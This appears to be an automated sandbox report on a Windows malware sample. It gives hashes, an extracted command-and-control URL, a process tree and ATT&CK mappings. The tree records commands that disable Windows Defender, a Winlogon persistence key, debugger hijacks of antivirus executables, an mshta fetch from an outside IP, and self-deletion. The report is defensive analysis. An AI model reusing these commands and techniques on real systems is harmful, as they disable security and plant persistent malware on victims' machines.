Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 04:20
Static task
static1
Behavioral task
behavioral1
Sample
d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe
-
Size
2.3MB
-
MD5
d999b09fd0ad1ef963ed1af0246a8110
-
SHA1
e34036f5fc0b7b3e41e3ec054ca0e8ff31d93d35
-
SHA256
b9ed117523b02cc9130d82ddb9e151f37474a8049e5938a4af15ab1713548821
-
SHA512
9106683ff7bf304980ecc09d23789dd3879d0d42a55027d87f5f13e577d23082ffef2dd73defd8e39964f195359214015cbac7f036cc7aa351fac260aab00e09
-
SSDEEP
49152:kWlGYm7UMfEL8295VM9hmljWXZU+7Z3JZX+++NpbE:kPB7xfEL8s5mOaVZ3z+++NpbE
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=ELZYPTFV&2=i-s&3=67&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\jimsga.exe" jimsga.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1972 mshta.exe 5 1972 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" jimsga.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" jimsga.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe jimsga.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe jimsga.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe jimsga.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe jimsga.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe jimsga.exe -
Deletes itself 1 IoCs
pid Process 1204 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 776 jimsga.exe -
Loads dropped DLL 2 IoCs
pid Process 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2760 sc.exe 3044 sc.exe 1728 sc.exe 2820 sc.exe 748 sc.exe 1196 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jimsga.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 776 jimsga.exe Token: SeShutdownPrivilege 776 jimsga.exe Token: SeDebugPrivilege 776 jimsga.exe Token: SeShutdownPrivilege 776 jimsga.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe 776 jimsga.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 776 jimsga.exe 776 jimsga.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2112 wrote to memory of 2760 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 30 PID 2112 wrote to memory of 2760 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 30 PID 2112 wrote to memory of 2760 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 30 PID 2112 wrote to memory of 2760 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 30 PID 2112 wrote to memory of 3044 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 31 PID 2112 wrote to memory of 3044 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 31 PID 2112 wrote to memory of 3044 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 31 PID 2112 wrote to memory of 3044 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 31 PID 2112 wrote to memory of 920 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 33 PID 2112 wrote to memory of 920 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 33 PID 2112 wrote to memory of 920 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 33 PID 2112 wrote to memory of 920 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 33 PID 2112 wrote to memory of 1728 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 35 PID 2112 wrote to memory of 1728 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 35 PID 2112 wrote to memory of 1728 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 35 PID 2112 wrote to memory of 1728 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 35 PID 2112 wrote to memory of 776 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 38 PID 2112 wrote to memory of 776 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 38 PID 2112 wrote to memory of 776 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 38 PID 2112 wrote to memory of 776 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 38 PID 920 wrote to memory of 2096 920 net.exe 39 PID 920 wrote to memory of 2096 920 net.exe 39 PID 920 wrote to memory of 2096 920 net.exe 39 PID 920 wrote to memory of 2096 920 net.exe 39 PID 2112 wrote to memory of 1204 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 40 PID 2112 wrote to memory of 1204 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 40 PID 2112 wrote to memory of 1204 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 40 PID 2112 wrote to memory of 1204 2112 d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe 40 PID 776 wrote to memory of 2820 776 jimsga.exe 42 PID 776 wrote to memory of 2820 776 jimsga.exe 42 PID 776 wrote to memory of 2820 776 jimsga.exe 42 PID 776 wrote to memory of 2820 776 jimsga.exe 42 PID 776 wrote to memory of 748 776 jimsga.exe 43 PID 776 wrote to memory of 748 776 jimsga.exe 43 PID 776 wrote to memory of 748 776 jimsga.exe 43 PID 776 wrote to memory of 748 776 jimsga.exe 43 PID 776 wrote to memory of 2932 776 jimsga.exe 45 PID 776 wrote to memory of 2932 776 jimsga.exe 45 PID 776 wrote to memory of 2932 776 jimsga.exe 45 PID 776 wrote to memory of 2932 776 jimsga.exe 45 PID 776 wrote to memory of 1196 776 jimsga.exe 47 PID 776 wrote to memory of 1196 776 jimsga.exe 47 PID 776 wrote to memory of 1196 776 jimsga.exe 47 PID 776 wrote to memory of 1196 776 jimsga.exe 47 PID 2932 wrote to memory of 2784 2932 net.exe 50 PID 2932 wrote to memory of 2784 2932 net.exe 50 PID 2932 wrote to memory of 2784 2932 net.exe 50 PID 2932 wrote to memory of 2784 2932 net.exe 50 PID 776 wrote to memory of 1972 776 jimsga.exe 51 PID 776 wrote to memory of 1972 776 jimsga.exe 51 PID 776 wrote to memory of 1972 776 jimsga.exe 51 PID 776 wrote to memory of 1972 776 jimsga.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d999b09fd0ad1ef963ed1af0246a8110_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2760
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Users\Admin\AppData\Roaming\jimsga.exeC:\Users\Admin\AppData\Roaming\jimsga.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:748
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=ELZYPTFV&2=i-s&3=67&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\D999B0~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:1204
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5d999b09fd0ad1ef963ed1af0246a8110
SHA1e34036f5fc0b7b3e41e3ec054ca0e8ff31d93d35
SHA256b9ed117523b02cc9130d82ddb9e151f37474a8049e5938a4af15ab1713548821
SHA5129106683ff7bf304980ecc09d23789dd3879d0d42a55027d87f5f13e577d23082ffef2dd73defd8e39964f195359214015cbac7f036cc7aa351fac260aab00e09